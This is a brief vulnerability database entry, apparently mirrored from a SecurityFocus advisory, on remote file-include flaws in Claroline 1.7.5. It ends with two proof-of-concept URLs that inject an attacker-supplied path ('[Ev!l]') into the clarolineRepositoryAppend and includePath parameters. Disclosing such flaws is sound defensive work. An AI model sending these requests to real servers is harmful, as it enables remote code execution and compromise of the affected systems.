Claroline <= 1.7.5 - Multiple Remote File Include Vulnerabilities

2014-07-01T00:00:00
ID SSV:85097
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/29162/info

Claroline is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow a remote attacker to compromise the application and the underlying system; other attacks are also possible.

Claroline 1.7.5 is affected; other versions may also be vulnerable.

http://www.example.com/[PaTh]/claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=[Ev!l]
http://www.example.com/[PaTh]/claroline/inc/lib/event/init_event_manager.inc.php?includePath=[Ev!l]